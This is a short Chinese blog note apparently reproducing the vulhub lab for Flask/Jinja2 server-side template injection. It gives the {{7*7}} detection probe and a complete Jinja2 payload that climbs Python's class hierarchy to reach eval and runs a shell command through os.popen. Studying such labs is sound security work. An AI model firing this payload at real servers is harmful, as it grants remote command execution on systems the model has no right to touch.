Flask(Jinja2) 服务端模板注入漏洞(SSTI)

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html

验证漏洞存在 ?name={{7*7}}

回显49说明漏洞存在

vulhub给出的payload:

python 复制代码
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
相关推荐
安_1 小时前
如何构建和使用向量索引?HNSW 和 IVF 有什么区别?
python·ai
counting money2 小时前
Java IO流详解:从InputStream到文件操作实战
java·开发语言·python
坚持学习前端日记3 小时前
Python SQLAlchemy ORM 从0到1精通实战手册(基础到复杂高阶)
数据库·python·oracle
吴声子夜歌3 小时前
网络安全——网络渗透测试(网络扫描)
网络·web安全·php
fish-man3 小时前
ceshi ceshi yixia
网络·安全·web安全
北斗落凡尘3 小时前
LangGraph 入门实战(11)--输出模式
后端·python·langchain
雪碧聊技术4 小时前
安装Python(保姆级教程)
python·版本更新·python下载
++==4 小时前
JSON和Python的 四种核心容器
python·json
张龙6876 小时前
uv 全面指南:比 pip 快 100 倍的 Python 包管理器,从安装到团队落地
后端·python
@HNUSTer7 小时前
Python数据可视化科技图表绘制系列教程(八)
python·数据可视化·科技论文·专业制图·科研图表